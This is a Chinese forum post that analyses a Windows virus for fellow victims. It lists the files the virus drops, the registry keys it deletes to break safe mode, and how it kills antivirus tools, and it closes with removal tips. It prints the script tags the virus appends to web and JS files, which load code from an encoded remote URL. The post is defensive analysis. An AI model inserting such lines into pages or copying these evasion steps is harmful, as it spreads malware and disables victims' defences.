|
首先说明我在其它论坛发过此帖,如果版主搜到,那是我发的
1.病毒运行后,生成如下文件
C:\\WINDOWS\\system32\\Com\\LSASS.EXE
C:\\WINDOWS\\system32\\Com\\netcfg.000
C:\\WINDOWS\\system32\\Com\\netcfg.dll
C:\\WINDOWS\\system32\\Com\\SMSS.EXE
C:\\WINDOWS\\system32\\894729.log
C:\\WINDOWS\\system32\\dnsq.dll
C:\\WINDOWS\\system32\\ntfsus.exe
C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe
或者在C:\\Documents and Settings\\用户名\\「开始」菜单\\程序\\启动下面
netcfg.dll负责注入IE并连接网络下载木马
并注册为浏览器加载项
[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\\WINDOWS\\system32\\com\\netcfg.dll, 506>
dnsq.dll会插入一些进程,并监控C:\\WINDOWS\\system32\\Com\\LSASS.EXE,如果该进程被结束,则立即恢复。
而且会监控~.exe,如果该文件被删除,立即重写。
894729.log即pagefile.pif文件
之中还会在C盘生成一个驱动,该驱动应该是用于提升权限所用
各个盘下面生成pagefile.pif和autorun.inf
2.通过查找窗口文字和和获得窗口线程进程ID等函数(GetWindowThreadProcessID)监控指定文字的窗口,之后会发送消息关闭窗口或者通过Terminate process函数结束进程,最终的结果是很多安全工具和杀毒软件不能使用,包括我们常用的sreng,Icesword以及Icesword修改版...
3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\\boot.ini,C:\\Windows\\system32\\drivers\\hosts
C:\\boot.ini不能写则Xdelbox等软件被废掉。
4.破坏安全模式
删除如下键
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Safer(和安全模式有关?)
HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
5.删除HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run键
6.破坏显示隐藏文件
HKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden改为0x00000000
7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件
8.感染非系统分区下面的htm,html等网页文件
在其尾部加入<script src=\"http://%6A%73%2E%6******B%1%30%32%2E%63%6F%6D/*\"></script>的代码
感染js等脚本文件
在其尾部加入document.write(\"<ScRiPt src=http://%6A%73%**31%30%32%2E%63%6F6D/*></sCrIpT>\");的代码
这个毒很厉害,从落雪到威金,现在是它,所有的杀毒软件都被搞死,sre、windows清理助手、冰仞也都被搞死,我用木马清道夫2008,能查出来毒,杀掉一部分后(另一部分杀不动),会死灰复燃。
用瑞星那个专杀要先查杀一下全盘,残留文件用gmer杀。。。
想想今年春节被这个病毒折腾够呛,现在大家应该都知道怎么杀了吧?感慨这个病毒给无数像我这样的菜鸟带来的无数的烦恼,再把它修改系统的地方贴上来,供大家参考! |
|